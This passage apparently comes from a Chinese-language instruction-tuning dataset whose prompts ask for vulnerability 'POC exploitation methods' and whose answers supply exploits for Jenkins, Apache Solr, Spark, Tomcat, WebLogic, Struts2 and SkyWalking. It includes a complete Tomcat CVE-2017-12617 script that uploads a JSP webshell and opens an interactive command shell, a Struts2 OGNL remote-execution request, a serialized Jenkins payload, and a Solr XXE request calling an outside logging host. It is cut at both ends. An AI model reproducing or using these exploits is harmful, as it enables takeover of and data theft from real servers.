x6c\\x65\\x3b\\x4c\\x00\\x0d\\x64\\x65\\x74\\x61\\x69\\x6c\\x4d\\x65\\x73\\x73\\x61\\x67\\x65\\x71\\x00\\x7e\\x00\\x02\\x5b\\x00\\x0a\\x73\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x74\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x4c\\x00\\x14\\x73\\x75\\x70\\x70\\x72\\x65\\x73\\x73\\x65\\x64\\x45\\x78\\x63\\x65\\x70\\x74\\x69\\x6f\\x6e\\x73\\x74\\x00\\x10\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4c\\x69\\x73\\x74\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x71\\x00\\x7e\\x00\\x10\\x70\\x75\\x72\\x00\\x1e\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x3b\\x02\\x46\\x2a\\x3c\\x3c\\xfd\\x22\\x39\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x0b\\x73\\x72\\x00\\x1b\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x61\\x63\\x6b\\x54\\x72\\x61\\x63\\x65\\x45\\x6c\\x65\\x6d\\x65\\x6e\\x74\\x61\\x09\\xc5\\x9a\\x26\\x36\\xdd\\x85\\x02\\x00\\x04\\x49\\x00\\x0a\\x6c\\x69\\x6e\\x65\\x4e\\x75\\x6d\\x62\\x65\\x72\\x4c\\x00\\x0e\\x64\\x65\\x63\\x6c\\x61\\x72\\x69\\x6e\\x67\\x43\\x6c\\x61\\x73\\x73\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x08\\x66\\x69\\x6c\\x65\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x4c\\x00\\x0a\\x6d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x71\\x00\\x7e\\x00\\x02\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x43\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x74\\x00\\x0c\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x06\\x3c\\x69\\x6e\\x69\\x74\\x3e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x32\\x71\\x00\\x7e\\x00\\x15\\x71\\x00\\x7e\\x00\\x16\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x63\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x0c\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x02\\x39\\x74\\x00\\x32\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x24\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x74\\x00\\x1c\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\xf6\\x74\\x00\\x27\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x71\\x00\\x7e\\x00\\x1e\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x73\\x71\\x00\\x7e\\x00\\x13\\xff\\xff\\xff\\xff\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x24\\x50\\x72\\x6f\\x78\\x79\\x31\\x70\\x74\\x00\\x0f\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x04\\xe7\\x74\\x00\\x17\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x72\\x65\\x6d\\x6f\\x74\\x69\\x6e\\x67\\x2e\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x74\\x00\\x0c\\x43\\x68\\x61\\x6e\\x6e\\x65\\x6c\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x15\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x52\\x65\\x6d\\x6f\\x74\\x65\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x93\\x74\\x00\\x0e\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x74\\x00\\x08\\x43\\x4c\\x49\\x2e\\x6a\\x61\\x76\\x61\\x71\\x00\\x7e\\x00\\x17\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x00\\x48\\x74\\x00\\x1f\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x19\\x43\\x4c\\x49\\x43\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x69\\x6f\\x6e\\x46\\x61\\x63\\x74\\x6f\\x72\\x79\\x2e\\x6a\\x61\\x76\\x61\\x74\\x00\\x07\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\xdf\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x05\\x5f\\x6d\\x61\\x69\\x6e\\x73\\x71\\x00\\x7e\\x00\\x13\\x00\\x00\\x01\\x86\\x71\\x00\\x7e\\x00\\x2a\\x71\\x00\\x7e\\x00\\x2b\\x74\\x00\\x04\\x6d\\x61\\x69\\x6e\\x73\\x72\\x00\\x26\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x4c\\x69\\x73\\x74\\xfc\\x0f\\x25\\x31\\xb5\\xec\\x8e\\x10\\x02\\x00\\x01\\x4c\\x00\\x04\\x6c\\x69\\x73\\x74\\x71\\x00\\x7e\\x00\\x0f\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x72\\x00\\x2c\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x24\\x55\\x6e\\x6d\\x6f\\x64\\x69\\x66\\x69\\x61\\x62\\x6c\\x65\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x19\\x42\\x00\\x80\\xcb\\x5e\\xf7\\x1e\\x02\\x00\\x01\\x4c\\x00\\x01\\x63\\x74\\x00\\x16\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x43\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x3b\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x73\\x72\\x00\\x13\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x41\\x72\\x72\\x61\\x79\\x4c\\x69\\x73\\x74\\x78\\x81\\xd2\\x1d\\x99\\xc7\\x61\\x9d\\x03\\x00\\x01\\x49\\x00\\x04\\x73\\x69\\x7a\\x65\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x00\\x77\\x04\\x00\\x00\\x00\\x00\\x78\\x71\\x00\\x7e\\x00\\x39\\x78\\x71\\x00\\x7e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x00\\x00\\x00\\x01\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x18\\x68\\x75\\x64\\x73\\x6f\\x6e\\x2e\\x63\\x6c\\x69\\x2e\\x43\\x6c\\x69\\x45\\x6e\\x74\\x72\\x79\\x50\\x6f\\x69\\x6e\\x74\\x71\\x00\\x7e\\x00\\x24\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x77\\x04\\xff\\xff\\xff\\xfd\\x78\\x70\\x00\\x00\\x00\\x01\\x74\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x74\\x00\\x1d\\x52\\x50\\x43\\x52\\x65\\x71\\x75\\x65\\x73\\x74\\x28\\x31\\x2c\\x77\\x61\\x69\\x74\\x46\\x6f\\x72\\x50\\x72\\x6f\\x70\\x65\\x72\\x74\\x79\\x29'\n\nsock.send(payload)\nprint('[+] Sent payload')\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Jenkins 远程代码执行漏洞 CVE-2015-8103.md"}
    1032. 

  1032. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr stream.url 任意文件读取漏洞\n漏洞描述:Apache Solr 存在任意文件读取漏洞,攻击者可以在未授权的情况下获取目标服务器敏感文件。 参考链接: - Apache Solr 组件安全概览 https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ - https://mp.weixin.qq.com/s/HMtAz6_unM1PrjfAzfwCUQ\n影响版本:``` Apache Solr <= 8.8.1 ```\n网络测绘:``` title=\"Solr Admin\" ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache Solr <= 8.8.1\n2. title=\"Solr Admin\"\n3. http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr stream.url 任意文件读取漏洞.md"}
    1033. 

  1033. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631\n漏洞描述:Apache Spark 是一种用于大数据工作负载的分布式开源处理系统。它使用内存中缓存和优化的查询执行方式,可针对任何规模的数据进行快速分析查询。它提供使用Java、Scala、Python 和 R 语言的开发 API,支持跨多个工作负载重用代码—批处理、交互式查询、实时分析、机器学习和图形处理等。当Spark任务的文件名可控时,`Utils.unpack`采用命令拼接的形式对tar文件进行解压,存在任意命令注入的风险。这是源于Hadoop中unTar函数存在问题,在其执行shell命令之前未正确转义文件名,直接拼接命令导致任意命令注入。\n影响版本:``` Apache Spark 3.1.2, 3.2.1, 3.3.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【POC利用方法】\n1. Apache Spark 3.1.2, 3.2.1, 3.3.0\n2. hadoop-common-2.7.4.jar!/org/apache/hadoop/fs/FileUtil.class\n3. public static void unTar(File inFile, File untarDir) throws IOException {\n        if (!untarDir.mkdirs() && !untarDir.isDirectory()) {\n            throw new IOException(\"Mkdirs failed to create \" + untarDir);\n        } else {\n            boolean gzipped = inFile.toString().endsWith(\"gz\");\n            if (Shell.WINDOWS) {\n                unTarUsingJava(inFile, untarDir, gzipped);\n            } else {\n                unTarUsingTar(inFile, untarDir, gzipped);\n            }\n\n        }\n    }\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Spark unTarUsingTar 命令注入漏洞 SPARK-38631.md"}
    1034. 

  1034. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat RCE via JSP Upload Bypass CVE-2017-12617\n漏洞描述:Apache Tomcat版本9.0.0.M1至9.0.0、8.5.0至8.5.22、8.0.0.RC1至8.0.46和7.0.0至7.0.81且启用HTTP PUT时(例如,通过设置只读如果将Default servlet的初始化参数设置为false,则可以通过特制请求将JSP文件上载到服务器。然后可以请求此JSP,并且服务器将执行其中包含的所有代码。\n影响版本:``` Apache Tomcat版本9.0.0.M1至9.0.0 Apache Tomcat版本8.5.0至8.5.22 Apache Tomcat版本8.0.0.RC1至8.0.46 Apache Tomcat版本7.0.0至7.0.81 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-12617\n【POC利用方法】\n1. Apache Tomcat版本9.0.0.M1至9.0.0\nApache Tomcat版本8.5.0至8.5.22\nApache Tomcat版本8.0.0.RC1至8.0.46\nApache Tomcat版本7.0.0至7.0.81\n2. #!/usr/bin/python\n# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py\n\"\"\"\n./cve-2017-12617.py [options]\n\n\noptions:\n\n\n-u ,--url [::] check target url if it's vulnerable\n-p,--pwn [::] generate webshell and upload it\n-l,--list [::] hosts list\n\n\n[+]usage:\n\n\n./cve-2017-12617.py -u http://127.0.0.1\n./cve-2017-12617.py --url http://127.0.0.1\n./cve-2017-12617.py -u http://127.0.0.1 -p pwn\n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn\n./cve-2017-12617.py -l hotsts.txt\n./cve-2017-12617.py --list hosts.txt\n\"\"\"\nfrom __future__ import print_function\nfrom builtins import input\nfrom builtins import str\nfrom builtins import object\nimport requests\nimport re\nimport signal\nfrom optparse import OptionParser\n\n\n\n\n\n\n\n\nclass bcolors(object):\n    HEADER = '\\033[95m'\n    OKBLUE = '\\033[94m'\n    OKGREEN = '\\033[92m'\n    WARNING = '\\033[93m'\n    FAIL = '\\033[91m'\n    ENDC = '\\033[0m'\n    BOLD = '\\033[1m'\n    UNDERLINE = '\\033[4m'\n\n\n\n\nbanner=\"\"\"\n\n\n   _______      ________    ___   ___  __ ______     __ ___   __ __ ______\n  / ____\\ \\    / /  ____|  |__ \\ / _ \\/_ |____  |   /_ |__ \\ / //_ |____  |\n | |     \\ \\  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /\n | |      \\ \\/ / |  __|______/ /| | | || |  / /______| | / / '_ \\| |  / /\n | |____   \\  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /\n  \\_____|   \\/   |______|  |____|\\___/ |_|/_/        |_|____\\___/|_|/_/\n\n\n\n[@intx0x80]\n\n\"\"\"\n\n\n\n\n\ndef signal_handler(signal, frame):\n\n    print (\"\\033[91m\"+\"\\n[-] Exiting\"+\"\\033[0m\")\n\n    exit()\n\nsignal.signal(signal.SIGINT, signal_handler)\n\n\n\n\ndef removetags(tags):\n    remove = re.compile('<.*?>')\n    txt = re.sub(remove, '\\n', tags)\n    return txt.replace(\"\\n\\n\\n\",\"\\n\")\n\n\ndef getContent(url,f):\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n    re=requests.get(str(url)+\"/\"+str(f), headers=headers)\n    return re.content\n\ndef createPayload(url,f):\n    evil='<% out.println(\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");%>'\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n    req=requests.put(str(url)+str(f)+\"/\",data=evil, headers=headers)\n    if req.status_code==201:\n        print(\"File Created ..\")\n\n\ndef RCE(url,f):\n    EVIL=\"\"\"<FORM METHOD=GET ACTION='{}'>\"\"\".format(f)+\"\"\"\n    <INPUT name='cmd' type=text>\n    <INPUT type=submit value='Run'>\n    </FORM>\n    <%@ page import=\"java.io.*\" %>\n    <%\n   String cmd = request.getParameter(\"cmd\");\n   String output = \"\";\n   if(cmd != null) {\n      String s = null;\n      try {\n         Process p = Runtime.getRuntime().exec(cmd,null,null);\n         BufferedReader sI = new BufferedReader(new\nInputStreamReader(p.getInputStream()));\n         while((s = sI.readLine()) != null) { output += s+\"</br>\"; }\n      }  catch(IOException e) {   e.printStackTrace();   }\n   }\n%>\n<pre><%=output %></pre>\"\"\"\n\n\n\n    headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n    req=requests.put(str(url)+f+\"/\",data=EVIL, headers=headers)\n\n\n\ndef shell(url,f):\n\n    while True:\n        headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n        cmd=input(\"$ \")\n        payload={'cmd':cmd}\n        if cmd==\"q\" or cmd==\"Q\":\n            break\n\n        re=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers)\n        re=str(re.content)\n        t=removetags(re)\n        print(t)\n\n\n\n\n\n#print bcolors.HEADER+ banner+bcolors.ENDC\n\nparse=OptionParser(\n\n\nbcolors.HEADER+\"\"\"\n\n\n   _______      ________    ___   ___  __ ______     __ ___   __ __ ______\n  / ____\\ \\    / /  ____|  |__ \\ / _ \\/_ |____  |   /_ |__ \\ / //_ |____  |\n | |     \\ \\  / /| |__ ______ ) | | | || |   / /_____| |  ) / /_ | |   / /\n | |      \\ \\/ / |  __|______/ /| | | || |  / /______| | / / '_ \\| |  / /\n | |____   \\  /  | |____    / /_| |_| || | / /       | |/ /| (_) | | / /\n  \\_____|   \\/   |______|  |____|\\___/ |_|/_/        |_|____\\___/|_|/_/\n\n\n\n\n./cve-2017-12617.py [options]\n\noptions:\n\n-u ,--url [::] check target url if it's vulnerable\n-p,--pwn  [::] generate webshell and upload it\n-l,--list [::] hosts list\n\n[+]usage:\n\n./cve-2017-12617.py -u http://127.0.0.1\n./cve-2017-12617.py --url http://127.0.0.1\n./cve-2017-12617.py -u http://127.0.0.1 -p pwn\n./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn\n./cve-2017-12617.py -l hotsts.txt\n./cve-2017-12617.py --list hosts.txt\n\n\n[@intx0x80]\n\n\"\"\"+bcolors.ENDC\n\n    )\n\n\nparse.add_option(\"-u\",\"--url\",dest=\"U\",type=\"string\",help=\"Website Url\")\nparse.add_option(\"-p\",\"--pwn\",dest=\"P\",type=\"string\",help=\"generate webshell and upload it\")\nparse.add_option(\"-l\",\"--list\",dest=\"L\",type=\"string\",help=\"hosts File\")\n\n(opt,args)=parse.parse_args()\n\nif opt.U==None and opt.P==None and opt.L==None:\n    print(parse.usage)\n    exit(0)\n\n\n\nelse:\n    if opt.U!=None and opt.P==None and opt.L==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        url=str(opt.U)\n        checker=\"Poc.jsp\"\n        print(bcolors.BOLD +\"Poc Filename  {}\".format(checker))\n        createPayload(str(url)+\"/\",checker)\n        con=getContent(str(url)+\"/\",checker)\n        if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:\n            print(bcolors.WARNING+url+' it\\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)\n            print(bcolors.WARNING+url+\"/\"+checker+bcolors.ENDC)\n\n        else:\n            print('Not Vulnerable to CVE-2017-12617 ')\n    elif opt.P!=None and opt.U!=None and  opt.L==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        pwn=str(opt.P)\n        url=str(opt.U)\n        print(\"Uploading Webshell .....\")\n        pwn=pwn+\".jsp\"\n        RCE(str(url)+\"/\",pwn)\n        shell(str(url),pwn)\n    elif opt.L!=None and opt.P==None and opt.U==None:\n        print(bcolors.OKGREEN+banner+bcolors.ENDC)\n        w=str(opt.L)\n        f=open(w,\"r\")\n        print(\"Scaning hosts in {}\".format(w))\n        checker=\"Poc.jsp\"\n        for i in f.readlines():\n            i=i.strip(\"\\n\")\n            createPayload(str(i)+\"/\",checker)\n            con=getContent(str(i)+\"/\",checker)\n            if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:\n                print(str(i)+\"\\033[91m\"+\" [ Vulnerable ] \"\"\\033[0m\")\n3. re=requests.get(str(url)+\"/\"+str(f),params=payload,headers=headers)\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Tomcat RCE via JSP Upload Bypass.md"}
    1035. 

  1035. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic 二次反序列化漏洞 CVE-2021-2394\n漏洞描述:Oracle官方发布了2021年7月份安全更新通告,通告中披露了WebLogic组件存在高危漏洞,攻击者可以在未授权的情况下通过IIOP、T3协议对存在漏洞的WebLogic Server组件进行攻击。成功利用该漏洞的攻击者可以接管WebLogic Server。 这是一个二次反序列化漏洞,是CVE-2020-14756和CVE-2020-14825的调用链相结合组成一条新的调用链来绕过weblogic黑名单列表。\n影响版本:``` Oracle WebLogic Server 10.3.6.0.0 Oracle WebLogic Server 12.1.3.0.0 Oracle WebLogic Server 12.2.1.3.0 Oracle WebLogic Server 12.2.1.4.0 Oracle WebLogic Server 14.1.1.0.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-2394\n【POC利用方法】\n1. Oracle WebLogic Server 10.3.6.0.0\nOracle WebLogic Server 12.1.3.0.0\nOracle WebLogic Server 12.2.1.3.0\nOracle WebLogic Server 12.2.1.4.0\nOracle WebLogic Server 14.1.1.0.0\n2. https://github.com/mbechler/marshalsec # 需要自己编译\nmvn clean package –DskipTests\n\nhttps://github.com/RandomRobbieBF/marshalsec-jar # 可以直接使用\n3. public class Exploit {\n\n    static {\n        System.err.println(\"Pwned\");\n        try {\n            String cmds = \"calc\";\n            Runtime.getRuntime().exec(cmds);\n        } catch ( Exception e ) {\n            e.printStackTrace();\n        }\n    }\n}\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Weblogic 二次反序列化漏洞 CVE-2021-2394.md"}
    1036. 

  1036. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805\n漏洞描述:该漏洞由于对CVE-2020-17530的修复不完整造成的,CVE-2020-17530漏洞是由于Struts2 会对某些标签属性(比如id) 的属性值进行二次表达式解析,因此当这些标签属性中使用了 %{x} 且 其中x 的值用户可控时,用户再传入一个 %{payload} 即可造成OGNL表达式执行。在CVE-2021-31805漏洞中,仍然存在部分标签属性会造成攻击者恶意构造的OGNL表达式执行,导致远程代码执行。\n影响版本:``` Struts 2.0.0 - Struts 2.5.29 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2021-31805\n【POC利用方法】\n1. Struts 2.0.0 - Struts 2.5.29\n2. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/struts2/s2-061\ndocker-compose up -d\n3. POST /index.action HTTP/1.1\nHost: localhost:8080\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36\nConnection: close\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Length: 829\n\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF\nContent-Disposition: form-data; name=\"id\"\n\n%{(#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]).(#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]).(#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")).(#bean.setBean(#stack)).(#context=#bean.get(\"context\")).(#bean.setBean(#context)).(#macc=#bean.get(\"memberAccess\")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")).(#bean.put(\"excludedClasses\",#emptyset)).(#bean.put(\"excludedPackageNames\",#emptyset)).(#arglist=#instancemanager.newInstance(\"java.util.ArrayList\")).(#arglist.add(\"id\")).(#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")).(#execute.exec(#arglist))}\n------WebKitFormBoundaryl7d1B1aGsV2wcZwF--\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Struts2 S2-062 远程代码执行漏洞 CVE-2021-31805.md"}
    1037. 

  1037. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr XXE 漏洞 CVE-2017-12629\n漏洞描述:Apache Solr 是一个开源的搜索服务器。Solr 使用 Java 语言开发,主要基于 HTTP 和 Apache Lucene 实现。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。此次7.1.0之前版本总共爆出两个漏洞:XML实体扩展漏洞(XXE)和远程命令执行漏洞(RCE)。\n影响版本:``` Apache Solr < 7.1 Apache Lucene < 7. ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2017-12629\n【POC利用方法】\n1. Apache Solr < 7.1\nApache Lucene < 7.\n2. https://github.com/vulhub/vulhub.git\ncd vulhub/solr/CVE-2017-12629-XXE\ndocker-compose build\ndocker-compose up -d\n3. http://xxx.xxx.xxx.xxx:8983/solr/demo/select?q={!xmlparser v='<!DOCTYPE a SYSTEM \"http://xxxxx.ceye.io\"><a></a>'}&wt=xml\n", "category": "poc_web_server_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web服务器漏洞/Apache Solr XXE 漏洞 CVE-2017-12629.md"}
    1038. 

  1038. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache SkyWalking graphql SQL注入漏洞 CVE-2020-9483\n漏洞描述:腾讯安全威胁情报中心监测到Apache SkyWalking发布更新,修复了一个SQL注入漏洞(编号:CVE-2020-9483)。远程攻击者可通过Apache SkyWalking默认开放的未授权GraphQL接口构造恶意请求包进行注入攻击,成功利用此漏洞可造成敏感数据泄漏。该漏洞等级为高危,腾讯安全专家建议相关企业尽快修复。\n影响版本:``` Apache SkyWalking 6.0.0~6.6.0 Apache SkyWalking 7.0.0 ```\n", "input": "", "output": "【漏洞类型】web_server_vulnerability\n【CVE编号】CVE-2020-9483\n【POC利用方法】\n1. Apache SkyWalking 6.0.0~6.6.0\nApache SkyWalking 7.0.0\n2. for i in \"$OAP_HOME\"/oap-libs/*.jar\ndo\n    CLASSPATH=\"$i:$CLASSPATH\"\ndone\n\nOAP_OPTIONS=\" -Doap.logDir=${OAP_LOG_DIR}\"\n\neval exec \"\\\"$_RUNJAVA\\\" ${JAVA_OPTS} ${OAP_OPTIONS} -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -classpath $CLASSPATH org.apache.skywalking.oap.server.starter.OAPServerStartUp \\\n        2>${OAP_LOG_DIR}/oap.log 1> /dev/null &\"\n\nif [ $? -eq 0 ]; then\n    sleep 1\n\techo \"SkyWalking OAP started successfully!\"\nelse\n\techo \"SkyWalking OAP started failure!\"\n\texit 1\n3. POST /graphql HTTP/1.1\nHost:\nAccept: 